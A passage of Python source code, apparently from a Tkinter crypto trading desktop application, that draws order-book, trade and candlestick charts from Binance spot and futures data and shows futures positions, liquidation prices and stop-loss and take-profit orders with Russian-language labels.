elif 0.1 > prSt >= 0.01:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0-ypi*(yI0/400)))
elif 0.01 > prSt >= 0.001:
app.graph_1.create_text(900,yp + grSt/2,text="%.3f" % (yI0-ypi*(yI0/400)))
elif 0.001 > prSt >= 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.4f" % (yI0-ypi*(yI0/400)))
elif prSt < 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.8f" % (yI0-ypi*(yI0/400)))
ypi += 1
yp=grMd
ypi=1
while yp > -1000:
points=[]
yp=grMd - ypi*((yI0/400)/prSt)*grSt
pp=(-500,yp)
points.append(pp)
pp=(500,yp)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0+ypi*(yI0/400)))
elif 0.1 > prSt >= 0.01:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0+ypi*(yI0/400)))
elif 0.01 > prSt >= 0.001:
app.graph_1.create_text(900,yp + grSt/2,text="%.3f" % (yI0+ypi*(yI0/400)))
elif 0.001 > prSt >= 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.4f" % (yI0+ypi*(yI0/400)))
elif prSt < 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.8f" % (yI0+ypi*(yI0/400)))
ypi += 1
for mm in range(len(myTup12[1])):
myDicGr1TT = myTup12[1][mm]
if int(myDicGr1TT['id']) > Lo:
xx=myDicGr1TT['time']
xxp = 20 + ((xx - TT0)/1000)*4
yyp = grMd - ((float(myDicGr1TT['price'])-yI0)/prSt)* grSt
if xxp > 1000:
app.graph_1.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT['quoteQty']) < 100:
x1, y1 = (xxp - 1), (yyp - 1)
x2, y2 = (xxp + 1), (yyp + 1)
elif 100 <= float(myDicGr1TT['quoteQty']) <= 1000:
x1, y1 = (xxp - 2 - 3*(float(myDicGr1TT['quoteQty'])/1000)), (yyp -2 - 3*(float(myDicGr1TT['quoteQty'])/1000))
x2, y2 = (xxp + 2 + 3*(float(myDicGr1TT['quoteQty'])/1000)), (yyp + 2 + 3*(float(myDicGr1TT['quoteQty'])/1000))
elif 1000 < float(myDicGr1TT['quoteQty']) <= 10000:
x1, y1 = (xxp - 5 - 3*(float(myDicGr1TT['quoteQty'])/10000)), (yyp - 5 - 3*(float(myDicGr1TT['quoteQty'])/10000))
x2, y2 = (xxp + 5 + 3*(float(myDicGr1TT['quoteQty'])/10000)), (yyp + 5 + 3*(float(myDicGr1TT['quoteQty'])/10000))
elif 10000 < float(myDicGr1TT['quoteQty']) <= 50000:
x1, y1 = (xxp - 8), (yyp - 8)
x2, y2 = (xxp + 8), (yyp + 8)
elif float(myDicGr1TT['quoteQty']) > 50000:
x1, y1 = (xxp - 10), (yyp - 10)
x2, y2 = (xxp + 10), (yyp + 10)
if myDicGr1TT['isBuyerMaker'] == True:
flc = "magenta"
if float(myDicGr1TT['quoteQty']) > 50000:
flc = "black"
else:
flc="green"
if float(myDicGr1TT['quoteQty']) > 50000:
flc = "gold"
app.graph_1.create_oval(x1, y1, x2, y2, fill=flc)
#print(x1,x2,y1,y2)
Lo=int(myDicGr1TT['id'])
#__Order book chart (Order Book Graph)
app.graph_2.delete("all")
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-yI0)/prSt)* grSt
#print('-', yI0, ' - ', float(mylist5[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5[m][0])-yI0)/prSt)* grSt
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="pink",width=grSt)
if float(mylist4[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist4[m][0])-yI0)/prSt)* grSt
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-yI0)/prSt)* grSt
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="lightgreen",width=grSt)
#______________Candlestick chart timer
class Timer_Candle:
def __init__(self):
global TE_Cnd
global yI
global Lo
global PEP
global PPA
global PSP
global PPP
global y0I_TP
global GPPP_Tmp
global GPSP_Tmp
global GPPP_Tmp_txt
global GPSP_Tmp_txt
global grMd
global grSt
global grFt
global GOS_TP
global GOS_SL
grFt_12 = font.Font(size=12)
grFt_10 = font.Font(size=10)
while True:
if PS1 == True:
sys_msg = ' Свечной график ' + grSmb + ' остановлен.'
app.Sys_Msg(text1=sys_msg)
TE_Cnd = True
break
if should_run_C:
for i in range(400):
if not should_run_C:
sys_msg = ' Свечной график ' + grSmb + ' будет остановлен.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_C:
if i==0:
sys_msg = ' Свечной график ' + grSmb + ' запущен.'
app.Sys_Msg(text1=sys_msg)
TE_Cnd = False
if i > 0:
time.sleep(0.5)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=10)) #tupl (IF LIMIT<=50 THEN WEIGHT = 2)
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=10)) #tupl (IF LIMIT<=50 THEN WEIGHT = 2)
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
if i==0:
app.Scale_TP.set(0)
app.Scale_SL.set(0)
#print(myTup11[1])
if MS=='SPOT' and i==0:
if GS=='CANDLE 5m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='5m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='5m', limit=288))
elif GS=='CANDLE 1m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='1m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='1m', limit=288))
elif GS=='CANDLE 15m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='15m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='15m', limit=288))
elif GS=='CANDLE 30m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='30m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='30m', limit=288))
elif GS=='CANDLE 1h':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='1h', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='1h', limit=288))
elif GS=='CANDLE 4h':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='4h', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='4h', limit=288))
elif GS=='CANDLE 1d':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='1d', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='1d', limit=288))
myDicGr1 = myTupSpK[1] #dict
myDicBTCD = myTupBTCD[1]
#print(myDicGr1)
yI0=float(myDicGr1[287][1])
y0I_TP = yI0
#print (myDicGr1[1][1])
elif MS=='FUTURES' and i==0:
if GS=='CANDLE 5m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='5m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='5m', limit=288)) #tupl
elif GS=='CANDLE 1m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='1m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1m', limit=288)) #tupl
elif GS=='CANDLE 15m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='15m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='15m', limit=288)) #tupl
elif GS=='CANDLE 30m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='30m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='30m', limit=288)) #tupl
elif GS=='CANDLE 1h':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='1h', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1h', limit=288)) #tupl
elif GS=='CANDLE 4h':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='4h', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='4h', limit=288)) #tupl
elif GS=='CANDLE 1d':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='1d', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1d', limit=288)) #tupl
my_file_Kl = open(grSmb + "_KL.txt", "w")
my_file_Kl.write(str(myTupFtK))
my_file_Kl.close()
#print(myTup12)
myDicGr1 = myTupFtK[1]
myDicBTCD = myTupBTCD[1]
#print(myDicGr1)
yI0=float(myDicGr1[287][1])
y0I_TP = yI0
if i==0:
PnL_Pos_L = ''
PnL_Pos_S = ''
BnMt = bot.futuresOrders(limit=1)
#print (BnMt)
Lo = int(BnMt[0]['orderId'])
#print (Lo)
yI=100
PnL_Pos = 0
app.graph_Cn.delete("all")
app.graph_VV.delete("all")
app.graph_BTCD.delete("all")
app.graph_Tb.delete("all")
app.graph_Td.delete("all")
grMd = grH/2
grSt = grZm/(yI0*0.01/prSt)
#print(grZm)
#print (grMd)
TT0 = time.mktime(time.localtime())*1000
points=[]
pp=(-500,grMd)
points.append(pp)
pp=(900,grMd)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1)
GAP = app.graph_Cn.create_line(points,fill="blue",width=1,dash=(4,2))
if MS == 'FUTURES':
GPEP_L = app.graph_Cn.create_line((0,0,0,0),fill="#336633",width=1,dash=(20,10))
GPEP_S = app.graph_Cn.create_line((0,0,0,0),fill="black",width=1,dash=(20,10))
GPLP = app.graph_Cn.create_line((0,0,0,0),fill="orange",width=3,dash=(20,10))
GPSP = app.graph_Cn.create_line((0,0,0,0),fill="red",width=3,dash=(20,10))
GPSP_txt = app.graph_Cn.create_text((0,0),text='',fill="red",font=grFt_12)
GPPP = app.graph_Cn.create_line((0,0,0,0),fill="green",width=3,dash=(20,10))
GPPP_txt = app.graph_Cn.create_text((0,0),text='',fill="green",font=grFt_12)
GPPP_Tmp = app.graph_Cn.create_line((0,0,0,0),fill="#66CDAA",width=1,dash=(50,50))
GPPP_Tmp_txt = app.graph_Cn.create_text((0,0),fill="#36a355",text='')
GPSP_Tmp = app.graph_Cn.create_line((0,0,0,0),fill="#DC143C",width=1,dash=(50,50))
GPSP_Tmp_txt = app.graph_Cn.create_text((0,0),fill="#DC143C",text='')
GEPt = app.graph_Cn.create_text(0,0,text='',fill="black",font=grFt_12)
GLO_L = []
GLO_L_txt = []
GLO_S = []
GLO_S_txt = []
for j in range (100):
GLO_L_L = app.graph_Cn.create_line((0,0,0,0),fill="#336633",width=1)
GLO_L.append(GLO_L_L)
GLO_L_L_txt = app.graph_Cn.create_text((0,0),fill="#336633",text='')
GLO_L_txt.append(GLO_L_L_txt)
GLO_S_S = app.graph_Cn.create_line((0,0,0,0),fill="#DC143C",width=1)
GLO_S.append(GLO_S_S)
GLO_S_S_txt = app.graph_Cn.create_text((0,0),fill="#DC143C",text='')
GLO_S_txt.append(GLO_S_S_txt)
GOS_TP = app.graph_Cn.create_rectangle((0,0,0,0),fill="#66CDAA")
GOS_SL = app.graph_Cn.create_rectangle((0,0,0,0),fill="pink")
#print(yI0,grMd,prSt)
if prSt >= 0.1:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue",font=grFt_10)
elif 0.1 > prSt >= 0.01:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue",font=grFt_10)
elif 0.01 > prSt >= 0.001:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.3f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.3f" % (yI0),fill="blue",font=grFt_10)
elif 0.001 > prSt >= 0.0001:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.4f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.4f" % (yI0),fill="blue",font=grFt_10)
elif prSt < 0.0001:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.8f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.8f" % (yI0),fill="blue",font=grFt_10)
yp=1180
ypi=0
while yp > -500:
points=[]
if GS=='CANDLE 5m':
yp_s = 12*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 1m':
yp_s = 10*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 15m':
yp_s = 8*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 30m':
yp_s = 8*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 1h':
yp_s = 12*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 4h':
yp_s = 12*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 1d':
yp_s = 14*4
yp = 1180 - ypi*yp_s
#print(yp)
pp = (yp,-500)
points.append(pp)
pp = (yp,1500)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1,dash=(4,2))
app.graph_Tb.create_line((yp,0,yp,70),fill="gray",width=1)
app.graph_Td.create_line((yp,0,yp,70),fill="gray",width=1)
if GS=='CANDLE 5m':
tm=TT0/1000+36000-ypi*3600
elif GS=='CANDLE 1m':
tm=TT0/1000+7200-ypi*600
elif GS=='CANDLE 15m':
tm=TT0/1000+108000-ypi*7200
elif GS=='CANDLE 30m':
tm=TT0/1000+216000-ypi*14400
elif GS=='CANDLE 1h':
tm=TT0/1000+432000-ypi*43200
elif GS=='CANDLE 4h':
tm=TT0/1000+1728000-ypi*172800
elif GS=='CANDLE 1d':
tm=TT0/1000+10368000-ypi*1209600
tm1 = datetime.datetime.fromtimestamp(tm)
if GS=='CANDLE 1m' or GS=='CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h':
tmm=tm1.strftime("%H:%M")
elif GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
tmm=tm1.strftime("%d.%m")
app.graph_Tb.create_text(1180 - ypi*yp_s,10,text=tmm)
app.graph_Td.create_text(1180 - ypi*yp_s,10,text=tmm)
ypi += 1
yp=grMd
if grZm <= 100:
ypi = 10
else:
ypi=1
while yp < 1500:
points=[]
yp=grMd +ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp) #400 == 0.25%
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0-ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0-ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0-ypi*(yI0/100)))
if grZm <= 100:
ypi += 10
else:
ypi += 1
yp=grMd
if grZm <= 100:
ypi = 10
else:
ypi=1
while yp > -1000:
points=[]
yp=grMd - ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp)
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0+ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0+ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0+ypi*(yI0/100)))
if grZm <= 100:
ypi += 10
else:
ypi += 1
#print (len(myDicGr1))
for mm in range(len(myDicGr1)):
myDicGr1TT = myDicGr1[mm]
myDicGr1BTCD = myDicBTCD[mm]
#print (myDicGr1TT)
xx=myDicGr1TT[0]
# print (xx)
if GS=='CANDLE 5m':
xxp = 700 + ((((xx - TT0)/1000)+150)/300)*4
elif GS=='CANDLE 1m':
xxp = 700 + ((((xx - TT0)/1000)+30)/60)*4
elif GS=='CANDLE 15m':
xxp = 700 + ((((xx - TT0)/1000)+450)/900)*4
elif GS=='CANDLE 30m':
xxp = 700 + ((((xx - TT0)/1000)+900)/1800)*4
elif GS=='CANDLE 1h':
xxp = 700 + ((((xx - TT0)/1000)+1800)/3600)*4
elif GS=='CANDLE 4h':
xxp = 700 + ((((xx - TT0)/1000)+7200)/14400)*4
elif GS=='CANDLE 1d':
xxp = 700 + ((((xx - TT0)/1000)+43200)/86400)*4
yyp1 = grMd - ((float(myDicGr1TT[2])-yI0)/(prSt*10))* grSt # MaxPrice
yyp2 = grMd - ((float(myDicGr1TT[3])-yI0)/(prSt*10))* grSt # MinPrice
yyp3 = grMd - ((float(myDicGr1TT[1])-yI0)/(prSt*10))* grSt #Open Price
yyp4 = grMd - ((float(myDicGr1TT[4])-yI0)/(prSt*10))* grSt #Close Price
if mm == 0:
yypVMax = 0
yypTMax = 0
for nm in range(len(myDicGr1)):
if float(myDicGr1[nm][5])>yypVMax:
#print(myDicGr1[nm][5])
yypVMax = float(myDicGr1[nm][5])
if float(myDicGr1[nm][8])>yypTMax:
#print(myDicGr1[nm][5])
yypTMax = float(myDicGr1[nm][8])
yyp5 = 100-((float(myDicGr1TT[5])/yypVMax))*100
yyp6 = ((float(myDicGr1TT[8])/yypTMax))*100
app.graph_BTCD.create_line(-100,50,1000,50,fill='black',dash=(1,1))
else:
yyp5 = 100-((float(myDicGr1TT[5])/yypVMax))*100
yyp6 = ((float(myDicGr1TT[8])/yypTMax))*100
if float(myDicGr1BTCD[1]) < float(myDicGr1BTCD[4]):
app.graph_BTCD.create_line(xxp,50,xxp,50-((float(myDicGr1BTCD[2])-float(myDicGr1BTCD[3]))/(float(myDicGr1BTCD[3])/100))*20,fill='green')
else:
app.graph_BTCD.create_line(xxp,50,xxp,50+((float(myDicGr1BTCD[2])-float(myDicGr1BTCD[3]))/(float(myDicGr1BTCD[3])/100))*20,fill='red')
if xxp > 1000:
app.graph_Cn.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT[1])<float(myDicGr1TT[4]):
flc = "green"
else:
flc="red"
app.graph_Cn.create_line(xxp, yyp1, xxp, yyp2, fill=flc)
app.graph_Cn.create_line(xxp-1, yyp3, xxp+1, yyp3, fill=flc)
app.graph_Cn.create_line(xxp-1, yyp4, xxp+1, yyp4, fill=flc)
app.graph_VV.create_line(xxp,100,xxp,yyp5,fill=flc)
app.graph_VV.create_line(xxp+1,0,xxp+1,yyp6,fill='black')
if MS == 'FUTURES':
BnFAcc=bot.userPositionInfo()
if len(BnFAcc)>0:
sTmp=''
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
#print(BnFAcc1)
if str(BnFAcc1['symbol'])==grSmb and float(BnFAcc1['positionAmt']) != 0:
y_liq = float(BnFAcc1['liquidationPrice'])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt # LiqPrice
app.graph_Cn.coords(GPLP, -500,y_liq,800,y_liq)
y_liq = float(BnFAcc1['entryPrice'])
PEP=float(BnFAcc1['entryPrice'])
PPA = float(BnFAcc1['positionAmt'])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt
#print (BnFAcc1['positionSide'])
if str(BnFAcc1['positionSide'])=='LONG':
app.graph_Cn.coords(GPEP_L, -500,y_liq,800,y_liq)
PnL_Pos_L = BnFAcc1['unRealizedProfit']
if str(BnFAcc1['positionSide'])=='SHORT':
#print (BnFAcc1['positionSide'])
app.graph_Cn.coords(GPEP_S, -500,y_liq,800,y_liq)
PnL_Pos_S = BnFAcc1['unRealizedProfit']
app.graph_Cn.coords(GEPt, 105, y_liq)
app.graph_Cn.itemconfigure(GEPt,text='Позиция: ' + str(BnFAcc1['positionSide']) + ' Цена: '+ str(float(BnFAcc1['entryPrice']))+'\n'+'Кол-во: ' + str(float(BnFAcc1['positionAmt'])*float(BnFAcc1['entryPrice']))+ ' USDT')
TO_CL=app.Tree_Ord.get_children()
TO_CC=len(TO_CL)
TO_Tpl_Tmp=[]
for nm in range(1,TO_CC+1):
TO_It = app.Tree_Ord.item(nm)["values"]
TO_It.append('-')
TO_Tpl_Tmp.append(TO_It)
#print(TO_Tpl_Tmp)
BnFAcc=bot.userOpenOrders(symbol=grSmb)
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET':
y_liq = float(BnFAcc1['stopPrice'])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt
PnL_dif = -(PEP * PPA - float(BnFAcc1['stopPrice']) * PPA)
app.graph_Cn.coords(GPSP, -500,y_liq,800,y_liq)
app.graph_Cn.coords(GPSP_txt, 600,y_liq)
app.graph_Cn.itemconfigure(GPSP_txt,text=('Stop-Loss. Цена: '+ str(BnFAcc1['stopPrice']) + '\n') + "%.2f" % (PnL_dif) + ' USDT')
PSP = float(BnFAcc1['stopPrice'])
if PosSide == 'LONG' and str(BnFAcc1['positionSide'])== 'LONG' and i==0:
app.Scale_SL.set (-float((100-(float(PSP)/float(PEP))*100)*float(Lvrg)))
if PosSide == 'SHORT' and str(BnFAcc1['positionSide'])== 'SHORT' and i==0:
app.Scale_TP.set (-float((100-(float(PSP)/float(PEP))*100)*float(Lvrg)))
if y_liq > 1000:
Ltmp = app.graph_Cn.configure()
#print(Ltmp['scrollregion'][4])
Ltmp1=Ltmp['scrollregion'][4].split()
#print(Ltmp1)
app.graph_Cn.configure(scrollregion=(Ltmp1[0],Ltmp1[1],Ltmp1[2],y_liq+200))
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET':
y_liq = float(BnFAcc1['stopPrice'])
PPP=y_liq
if PosSide == 'LONG' and str(BnFAcc1['positionSide'])== 'LONG' and i==0:
app.Scale_TP.set (-float((100-(float(y_liq)/float(PEP))*100)*float(Lvrg)))
if PosSide == 'SHORT' and str(BnFAcc1['positionSide'])== 'SHORT' and i==0:
app.Scale_SL.set (-float((100-(float(y_liq)/float(PEP))*100)*float(Lvrg)))
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt # LiqPrice
PnL_dif = -(PEP * PPA - float(BnFAcc1['stopPrice']) * PPA)
app.graph_Cn.coords(GPPP, -500,y_liq,800,y_liq)
app.graph_Cn.coords(GPPP_txt,600,y_liq)
app.graph_Cn.itemconfigure(GPPP_txt,text=('Take-profit. Цена: '+ str(BnFAcc1['stopPrice']) + '\n') + "%.2f" % (PnL_dif) + ' USDT')
if y_liq < -500:
Ltmp = app.graph_Cn.configure()
Ltmp1=Ltmp['scrollregion'][4].split()
#print(Ltmp1)
app.graph_Cn.configure(scrollregion=(Ltmp1[0],y_liq-200,Ltmp1[2],Ltmp1[3]))
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='LIMIT' and str(BnFAcc1['type'])=='LIMIT':
#print(BnFAcc1)
TO_CL=app.Tree_Ord.get_children()
TO_CC=len(TO_CL)
lo = TO_CC+1
TO_SCh = True
if TO_CC > 0:
for nm in range(1,TO_CC+1):
TO_It = app.Tree_Ord.item(nm)["values"]
#print(TO_It[0],TO_It[1],TO_It[2],TO_It[3])
if TO_It[0] == str(BnFAcc1['positionSide']) and TO_It[1] == str(BnFAcc1['side']) and float(TO_It[2]) == float(BnFAcc1['price']) and float(TO_It[3]) == float(BnFAcc1['origQty']):
app.Tree_Ord.item(nm, values=(str(BnFAcc1['positionSide']),str(BnFAcc1['side']),str(BnFAcc1['price']),str(BnFAcc1['origQty']),
str(BnFAcc1['origType'])))
TO_Tpl_Tmp[nm-1][5]='+'
TO_SCh = False
#print(TO_It[0],TO_It[1],TO_It[2],TO_It[3])
if TO_SCh == True and float(BnFAcc1['price']) != 0:
#print(TP_It)
#print(str(BnFAcc1['symbol']),str(BnFAcc1['unRealizedProfit']),str(BnFAcc1['positionSide']))
app.Tree_Ord.insert(parent='',index='end',iid=lo,text='',values=(str(BnFAcc1['positionSide']),str(BnFAcc1['side']),str(BnFAcc1['price']),str(BnFAcc1['origQty']),
str(BnFAcc1['origType'])))
lo +=1
#print(TO_Tpl_Tmp)
TO_CL=app.Tree_Ord.get_children()
TO_CC=len(TO_CL)
TO_Tpl_Tmp2=[]
for nm in range(1,TO_CC+1):
TO_It = app.Tree_Ord.item(nm)["values"]
TO_Tpl_Tmp2.append(app.Tree_Ord.item(nm)["values"])
#print(TO_Tpl_Tmp)
#print(TO_Tpl_Tmp2)
for nm in range(1,TO_CC+1):
if nm-1 <= len(TO_Tpl_Tmp)-1 and len(TO_Tpl_Tmp)>0 :
if TO_Tpl_Tmp[nm-1][5] == '-' or TO_Tpl_Tmp[nm-1][5] == '':
TO_Tpl_Tmp2[nm-1][2] = '0'
TO_Tpl_Tmp2[nm-1][3] = '0'
kk=0
nm_d=False
for nm in range(1,TO_CC+1):
TO_It = app.Tree_Ord.item(nm)["values"]
if float(TO_Tpl_Tmp2[nm-1][2]) == 0 and float(TO_Tpl_Tmp2[nm-1][3]) == 0 and kk<=len(TO_Tpl_Tmp2):
nm_d=True
km=False
for mn in range(kk,len(TO_Tpl_Tmp2)):
#print(mm)
if float(TO_Tpl_Tmp2[mn][2])!=0 and float(TO_Tpl_Tmp2[mn][3])!=0 and km==False:
app.Tree_Ord.item(nm, values=(TO_Tpl_Tmp2[mn][0],TO_Tpl_Tmp2[mn][1],TO_Tpl_Tmp2[mn][2],TO_Tpl_Tmp2[mn][3],TO_Tpl_Tmp2[mn][4],TO_Tpl_Tmp2[mn][5]))
kk=mn+1
#print(nn,kk,mm)
km=True
if nm_d==True and km==False:
kk=len(TO_Tpl_Tmp2)+1
else:
#print(nn,kk)
if nm_d==True and kk<TO_CC:
app.Tree_Ord.item(nm, values=(TO_Tpl_Tmp2[kk][0],TO_Tpl_Tmp2[kk][1],TO_Tpl_Tmp2[kk][2],TO_Tpl_Tmp2[kk][3],TO_Tpl_Tmp2[kk][4],TO_Tpl_Tmp2[kk][5]))
if TO_Tpl_Tmp2[kk][0] == 'LONG':
app.Tree_Ord.item(nm,tags=('long'))
elif TO_Tpl_Tmp2[kk][0] == 'SHORT':
app.Tree_Ord.item(nm,tags=('short'))
app.Tree_Ord.tag_configure('long', background='#d6f8d6')
app.Tree_Ord.tag_configure('short', background='#fce7e7')
kk +=1
if kk > len(TO_Tpl_Tmp2) and nm<=TO_CC+1:
app.Tree_Ord.delete(nm)
elif len(BnFAcc) == 0:
TO_CL=app.Tree_Ord.get_children()
TO_CC=len(TO_CL)
if TO_CC > 0:
app.Tree_Ord.delete(*app.Tree_Ord.get_children())
TO_CL=app.Tree_Ord.get_children()
TO_CC=len(TO_CL)
if TO_CC >= len(GLO_L) and TO_CC >= len(GLO_S):
jj = TO_CC
elif TO_CC <= len(GLO_L) and len(GLO_L) >= len(GLO_S):
jj = len(GLO_L)
elif TO_CC <= len(GLO_S) and len(GLO_S) >= len(GLO_L):
jj = len(GLO_S)
GLO_L_Ci = 0
GLO_S_Ci = 0
for nm in range(jj):
if nm < TO_CC:
TO_It = app.Tree_Ord.item(nm+1)["values"]
if str(TO_It[0])== 'LONG':
y_liq = float(TO_It[2])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt
app.graph_Cn.coords(GLO_L[GLO_L_Ci],800,y_liq,900,y_liq)
app.graph_Cn.coords(GLO_L_txt[GLO_L_Ci],800,y_liq)
app.graph_Cn.itemconfigure(GLO_L_txt[GLO_L_Ci],text='Ордер LONG\n'+str(TO_It[2]))
GLO_L_Ci +=1
elif str(TO_It[0])== 'SHORT':
y_liq = float(TO_It[2])
